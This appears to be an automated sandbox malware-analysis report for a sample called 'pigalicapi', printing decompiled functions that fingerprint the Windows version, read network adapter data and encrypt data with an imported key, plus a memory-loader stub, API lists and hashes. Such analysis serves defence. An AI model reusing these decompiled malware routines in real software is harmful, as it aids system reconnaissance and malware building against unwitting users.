                                                                                                                                                                                                                                                                            0x007b89d9
                                                                                                                                                                                                                                                                            0x007b8a02
                                                                                                                                                                                                                                                                            0x007b8a04
                                                                                                                                                                                                                                                                            0x007b8a27
                                                                                                                                                                                                                                                                            0x007b8a3d
                                                                                                                                                                                                                                                                            0x007b8a41
                                                                                                                                                                                                                                                                            0x007b8a47
                                                                                                                                                                                                                                                                            0x007b8a4e
                                                                                                                                                                                                                                                                            0x007b8a4e
                                                                                                                                                                                                                                                                            0x007b8a5a
                                                                                                                                                                                                                                                                            0x007b8a5a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b8a02

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 007B89BF
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 007B89C9
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B89F8
                                                                                                                                                                                                                                                                            • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B8A1F
                                                                                                                                                                                                                                                                            • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 007B8A41
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 007B8A4E
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007B8A5A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 007B89B0
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 007B89E8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                            • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                                            • Opcode ID: 05b08c3ab1ef91dd291abd0e2e1d70f907f64439200d57a70c787ab82a0f6ca1
                                                                                                                                                                                                                                                                            • Instruction ID: f099420aa6c3a27006d726511f861e17ce91afc6a7d7a6567361fae0e9cfb41f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05b08c3ab1ef91dd291abd0e2e1d70f907f64439200d57a70c787ab82a0f6ca1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19312C71A00208FFDB54DFA4CC49FEE77B8BB48701F10C249F501AA280CBB89A80CB51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00B021DF
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00B022A1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812988867.0000000000B02000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B02000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_b02000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                                                                                            • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                            • API String ID: 3550616410-2784972518
                                                                                                                                                                                                                                                                            • Opcode ID: 6ed5061a9234c800ae55e5c65d58f53de4d2ae9f82314e07c98080bed1c91dc8
                                                                                                                                                                                                                                                                            • Instruction ID: f37233397a9cd6a8ab5099b7a0f61143f3d7fb48483c8fa683ce06bc210c0a92
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ed5061a9234c800ae55e5c65d58f53de4d2ae9f82314e07c98080bed1c91dc8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C0226B1A00209DFDB14CF98C889BADBBF5FF48314F2481A9E915AB381D774EA45CB54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                                                            			E007B9F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                                            				intOrPtr* _t59;
                                                                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                                                                            				void* _t99;
                                                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 1;
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					_t103 = _a8 - 5;
                                                                                                                                                                                                                                                                            					if(_a8 > 5) {
                                                                                                                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                                                                                                                            						_t59 = E007B97A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288); // executed
                                                                                                                                                                                                                                                                            						_t100 = _t99 + 4;
                                                                                                                                                                                                                                                                            						_v28 = _t59;
                                                                                                                                                                                                                                                                            						_v12 = _v28;
                                                                                                                                                                                                                                                                            						if(_v12 != 0) {
                                                                                                                                                                                                                                                                            							_v16 = _v12;
                                                                                                                                                                                                                                                                            							_v20 = _a8 * 0x288 / 6;
                                                                                                                                                                                                                                                                            							_push( &_v20);
                                                                                                                                                                                                                                                                            							_t64 = _v12;
                                                                                                                                                                                                                                                                            							_push(_t64); // executed
                                                                                                                                                                                                                                                                            							L007BB1DA(); // executed
                                                                                                                                                                                                                                                                            							if(_t64 == 0) {
                                                                                                                                                                                                                                                                            								_v24 = 0;
                                                                                                                                                                                                                                                                            								while(_v12 != 0 && _v24 < _a8) {
                                                                                                                                                                                                                                                                            									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
                                                                                                                                                                                                                                                                            										E007B7B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
                                                                                                                                                                                                                                                                            										_t100 = _t100 + 0xc;
                                                                                                                                                                                                                                                                            										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
                                                                                                                                                                                                                                                                            										_v12 =  *_v12;
                                                                                                                                                                                                                                                                            										_v8 = 1;
                                                                                                                                                                                                                                                                            										continue;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								 *_a12 = _v24;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v32 = _v16;
                                                                                                                                                                                                                                                                            							E007B97C0(_v32);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                            0x007b9f76
                                                                                                                                                                                                                                                                            0x007b9f81
                                                                                                                                                                                                                                                                            0x007b9f87
                                                                                                                                                                                                                                                                            0x007b9f8b
                                                                                                                                                                                                                                                                            0x007b9f94
                                                                                                                                                                                                                                                                            0x007b9fad
                                                                                                                                                                                                                                                                            0x007b9fb2
                                                                                                                                                                                                                                                                            0x007b9fb5
                                                                                                                                                                                                                                                                            0x007b9fbb
                                                                                                                                                                                                                                                                            0x007b9fc2
                                                                                                                                                                                                                                                                            0x007b9fcb
                                                                                                                                                                                                                                                                            0x007b9fe0
                                                                                                                                                                                                                                                                            0x007b9fe6
                                                                                                                                                                                                                                                                            0x007b9fe7
                                                                                                                                                                                                                                                                            0x007b9fea
                                                                                                                                                                                                                                                                            0x007b9feb
                                                                                                                                                                                                                                                                            0x007b9ff2
                                                                                                                                                                                                                                                                            0x007b9ff4
                                                                                                                                                                                                                                                                            0x007b9ffb
                                                                                                                                                                                                                                                                            0x007ba018
                                                                                                                                                                                                                                                                            0x007ba034
                                                                                                                                                                                                                                                                            0x007ba039
                                                                                                                                                                                                                                                                            0x007ba048
                                                                                                                                                                                                                                                                            0x007ba050
                                                                                                                                                                                                                                                                            0x007ba053
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007ba05e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007ba018
                                                                                                                                                                                                                                                                            0x007ba066
                                                                                                                                                                                                                                                                            0x007ba066
                                                                                                                                                                                                                                                                            0x007ba06b
                                                                                                                                                                                                                                                                            0x007ba072
                                                                                                                                                                                                                                                                            0x007ba077
                                                                                                                                                                                                                                                                            0x007b9fc2
                                                                                                                                                                                                                                                                            0x007b9f8b
                                                                                                                                                                                                                                                                            0x007ba080

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 007B97A0: GetProcessHeap.KERNEL32(00000008,007B9FB2,?,007B9FB2,00000000,?,?,?,007B9E2D), ref: 007B97A9
                                                                                                                                                                                                                                                                              • Part of subcall function 007B97A0: RtlAllocateHeap.NTDLL(00000000,?,007B9FB2,00000000,?,?,?,007B9E2D), ref: 007B97B0
                                                                                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,007B9E2D), ref: 007B9FEB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1318000056-0
                                                                                                                                                                                                                                                                            • Opcode ID: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                                                                                                            • Instruction ID: faefb44d8da3c88e4f42f0da99090636509ce1875c0616a522060d5e3e3f7c39
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99310D74E00209EFDF08DF98C495BEEB7B5EF48304F108169E909A7350E7399A45CB51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 204 7b8f80-7b8f94 205 7b927b-7b9281 204->205 206 7b8f9a-7b8f9e 204->206 206->205 207 7b8fa4-7b8fa8 206->207 207->205 208 7b8fae-7b8fff call 7b7d20 * 3 GetVersionExA 207->208 215 7b9266-7b926a 208->215 216 7b9005-7b9016 GetSystemInfo 208->216 215->205 217 7b926c-7b9275 lstrcatA 215->217 218 7b901c-7b9023 216->218 219 7b9115-7b911c 216->219 217->205 222 7b9042-7b9049 218->222 223 7b9025-7b903d lstrcatA 218->223 220 7b9122-7b9129 219->220 221 7b9210-7b9217 call 7b9290 219->221 224 7b912b-7b9132 220->224 225 7b9174-7b917b 220->225 243 7b9219-7b9222 lstrcatA 221->243 244 7b9228-7b9237 lstrlenA 221->244 228 7b904b-7b9063 lstrcatA 222->228 229 7b9068-7b906f 222->229 227 7b9110 223->227 232 7b914e-7b9155 224->232 233 7b9134-7b914c lstrcatA 224->233 230 7b917d-7b9184 225->230 231 7b91c3-7b91ca 225->231 227->221 228->227 229->227 235 7b9075-7b907c 229->235 238 7b91a0-7b91a7 230->238 239 7b9186-7b919e lstrcatA 230->239 231->221 240 7b91cc-7b91d3 231->240 241 7b916f 232->241 242 7b9157-7b9169 lstrcatA 232->242 233->241 236 7b907e-7b9085 235->236 237 7b90a1-7b90ab GetSystemMetrics 235->237 236->237 247 7b9087-7b909f lstrcatA 236->247 248 7b90ad-7b90c5 lstrcatA 237->248 249 7b90c7-7b90d1 GetSystemMetrics 237->249 250 7b91c1 238->250 251 7b91a9-7b91bb lstrcatA 238->251 239->250 252 7b91ef-7b91f6 240->252 253 7b91d5-7b91ed lstrcatA 240->253 241->221 242->241 243->244 245 7b9259-7b9263 lstrlenA 244->245 246 7b9239-7b9253 lstrcatA * 2 244->246 245->215 246->245 247->227 248->227 254 7b90ed-7b90f6 249->254 255 7b90d3-7b90eb lstrcatA 249->255 250->221 251->250 252->221 256 7b91f8-7b920a lstrcatA 252->256 253->221 254->227 257 7b90f8-7b910a lstrcatA 254->257 255->227 256->221 257->227
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B8F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v44;
                                                                                                                                                                                                                                                                            				signed int _v50;
                                                                                                                                                                                                                                                                            				signed short _v52;
                                                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v204;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                            					L45:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					E007B7D20(E007B7D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
                                                                                                                                                                                                                                                                            					_v204.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                                                                            					E007B7D20( &_v44,  &_v44, 0, 0x24);
                                                                                                                                                                                                                                                                            					if(GetVersionExA( &_v204) == 0) {
                                                                                                                                                                                                                                                                            						L43:
                                                                                                                                                                                                                                                                            						if(_v8 == 0) {
                                                                                                                                                                                                                                                                            							lstrcatA(_a4, "UndefinedOS");
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L45;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					GetSystemInfo( &_v44); // executed
                                                                                                                                                                                                                                                                            					if(_v204.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                                            						if(_v204.dwMajorVersion == 6) {
                                                                                                                                                                                                                                                                            							if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                            								if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                            									if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                            										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                            											if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                            												lstrcatA(_a4, "Win8");
                                                                                                                                                                                                                                                                            												 *_a12 = 0xb;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											lstrcatA(_a4, "WinServer2012");
                                                                                                                                                                                                                                                                            											 *_a12 = 0xc;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                            										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                            											lstrcatA(_a4, "Win7");
                                                                                                                                                                                                                                                                            											 *_a12 = 8;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										lstrcatA(_a4, "WinServer2008R2");
                                                                                                                                                                                                                                                                            										 *_a12 = 0xa;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                            									if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                            										lstrcatA(_a4, "WinServer2008");
                                                                                                                                                                                                                                                                            										 *_a12 = 9;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									lstrcatA(_a4, "Vista");
                                                                                                                                                                                                                                                                            									 *_a12 = 7;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						L38:
                                                                                                                                                                                                                                                                            						if(E007B9290() != 0) {
                                                                                                                                                                                                                                                                            							lstrcatA(_a4, "_x64");
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
                                                                                                                                                                                                                                                                            							lstrcatA(_a4, "_");
                                                                                                                                                                                                                                                                            							lstrcatA(_a4,  &(_v204.szCSDVersion));
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v8 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                            						goto L43;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                            						if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                            							if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                            								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
                                                                                                                                                                                                                                                                            									if(GetSystemMetrics(0x59) != 0) {
                                                                                                                                                                                                                                                                            										if(GetSystemMetrics(0x59) == 0) {
                                                                                                                                                                                                                                                                            											if((_v52 & 0x8000) != 0) {
                                                                                                                                                                                                                                                                            												lstrcatA(_a4, "WinHomeServer");
                                                                                                                                                                                                                                                                            												 *_a12 = 4;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											lstrcatA(_a4, "WinServer2003R2");
                                                                                                                                                                                                                                                                            											 *_a12 = 6;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										lstrcatA(_a4, "WinServer2003");
                                                                                                                                                                                                                                                                            										 *_a12 = 5;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									lstrcatA(_a4, "WinXP64");
                                                                                                                                                                                                                                                                            									 *_a12 = 3;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							lstrcatA(_a4, "WinXP");
                                                                                                                                                                                                                                                                            							 *_a12 = 2;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						lstrcatA(_a4, "Win2K");
                                                                                                                                                                                                                                                                            						 *_a12 = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L38;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                                            0x007b8f89
                                                                                                                                                                                                                                                                            0x007b8f94
                                                                                                                                                                                                                                                                            0x007b927b
                                                                                                                                                                                                                                                                            0x007b9281
                                                                                                                                                                                                                                                                            0x007b8fae
                                                                                                                                                                                                                                                                            0x007b8fce
                                                                                                                                                                                                                                                                            0x007b8fd6
                                                                                                                                                                                                                                                                            0x007b8fe8
                                                                                                                                                                                                                                                                            0x007b8fff
                                                                                                                                                                                                                                                                            0x007b9266
                                                                                                                                                                                                                                                                            0x007b926a
                                                                                                                                                                                                                                                                            0x007b9275
                                                                                                                                                                                                                                                                            0x007b9275
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b926a
                                                                                                                                                                                                                                                                            0x007b9009
                                                                                                                                                                                                                                                                            0x007b9016
                                                                                                                                                                                                                                                                            0x007b911c
                                                                                                                                                                                                                                                                            0x007b9129
                                                                                                                                                                                                                                                                            0x007b917b
                                                                                                                                                                                                                                                                            0x007b91ca
                                                                                                                                                                                                                                                                            0x007b91d3
                                                                                                                                                                                                                                                                            0x007b91f6
                                                                                                                                                                                                                                                                            0x007b9201
                                                                                                                                                                                                                                                                            0x007b920a
                                                                                                                                                                                                                                                                            0x007b920a
                                                                                                                                                                                                                                                                            0x007b91d5
                                                                                                                                                                                                                                                                            0x007b91de
                                                                                                                                                                                                                                                                            0x007b91e7
                                                                                                                                                                                                                                                                            0x007b91e7
                                                                                                                                                                                                                                                                            0x007b91d3
                                                                                                                                                                                                                                                                            0x007b917d
                                                                                                                                                                                                                                                                            0x007b9184
                                                                                                                                                                                                                                                                            0x007b91a7
                                                                                                                                                                                                                                                                            0x007b91b2
                                                                                                                                                                                                                                                                            0x007b91bb
                                                                                                                                                                                                                                                                            0x007b91bb
                                                                                                                                                                                                                                                                            0x007b9186
                                                                                                                                                                                                                                                                            0x007b918f
                                                                                                                                                                                                                                                                            0x007b9198
                                                                                                                                                                                                                                                                            0x007b9198
                                                                                                                                                                                                                                                                            0x007b91c1
                                                                                                                                                                                                                                                                            0x007b912b
                                                                                                                                                                                                                                                                            0x007b9132
                                                                                                                                                                                                                                                                            0x007b9155
                                                                                                                                                                                                                                                                            0x007b9160
                                                                                                                                                                                                                                                                            0x007b9169
                                                                                                                                                                                                                                                                            0x007b9169
                                                                                                                                                                                                                                                                            0x007b9134
                                                                                                                                                                                                                                                                            0x007b913d
                                                                                                                                                                                                                                                                            0x007b9146
                                                                                                                                                                                                                                                                            0x007b9146
                                                                                                                                                                                                                                                                            0x007b916f
                                                                                                                                                                                                                                                                            0x007b9129
                                                                                                                                                                                                                                                                            0x007b9210
                                                                                                                                                                                                                                                                            0x007b9217
                                                                                                                                                                                                                                                                            0x007b9222
                                                                                                                                                                                                                                                                            0x007b9222
                                                                                                                                                                                                                                                                            0x007b9237
                                                                                                                                                                                                                                                                            0x007b9242
                                                                                                                                                                                                                                                                            0x007b9253
                                                                                                                                                                                                                                                                            0x007b9253
                                                                                                                                                                                                                                                                            0x007b9263
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b9263
                                                                                                                                                                                                                                                                            0x007b9023
                                                                                                                                                                                                                                                                            0x007b9049
                                                                                                                                                                                                                                                                            0x007b906f
                                                                                                                                                                                                                                                                            0x007b907c
                                                                                                                                                                                                                                                                            0x007b90ab
                                                                                                                                                                                                                                                                            0x007b90d1
                                                                                                                                                                                                                                                                            0x007b90f6
                                                                                                                                                                                                                                                                            0x007b9101
                                                                                                                                                                                                                                                                            0x007b910a
                                                                                                                                                                                                                                                                            0x007b910a
                                                                                                                                                                                                                                                                            0x007b90d3
                                                                                                                                                                                                                                                                            0x007b90dc
                                                                                                                                                                                                                                                                            0x007b90e5
                                                                                                                                                                                                                                                                            0x007b90e5
                                                                                                                                                                                                                                                                            0x007b90ad
                                                                                                                                                                                                                                                                            0x007b90b6
                                                                                                                                                                                                                                                                            0x007b90bf
                                                                                                                                                                                                                                                                            0x007b90bf
                                                                                                                                                                                                                                                                            0x007b9087
                                                                                                                                                                                                                                                                            0x007b9090
                                                                                                                                                                                                                                                                            0x007b9099
                                                                                                                                                                                                                                                                            0x007b9099
                                                                                                                                                                                                                                                                            0x007b907c
                                                                                                                                                                                                                                                                            0x007b904b
                                                                                                                                                                                                                                                                            0x007b9054
                                                                                                                                                                                                                                                                            0x007b905d
                                                                                                                                                                                                                                                                            0x007b905d
                                                                                                                                                                                                                                                                            0x007b9025
                                                                                                                                                                                                                                                                            0x007b902e
                                                                                                                                                                                                                                                                            0x007b9037
                                                                                                                                                                                                                                                                            0x007b9037
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b9110

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(0000009C), ref: 007B8FF7
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 007B9009
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,Win2K), ref: 007B902E
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,WinXP), ref: 007B9054
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,Vista), ref: 007B913D
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 007B9160
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 007B918F
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,Win7), ref: 007B91B2
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 007B91DE
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,Win8), ref: 007B9201
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,_x64), ref: 007B9222
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 007B922F
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,007BC980), ref: 007B9242
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,?), ref: 007B9253
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B925D
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 007B9275
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                                            • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                                            • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                                            • Opcode ID: f354611766f6fbefe72ab735263e0aef736d5c47775f5681d274f4be160767ad
                                                                                                                                                                                                                                                                            • Instruction ID: 0091b460db5ed2b4a14daef912ab22b1ed98ad5beb5a4aae9d5beed5f961649b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f354611766f6fbefe72ab735263e0aef736d5c47775f5681d274f4be160767ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C812BB4A4021DEBDB259F60CC8AFEE7B79BB05301F10C645FA55AA280D77CD980DB60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
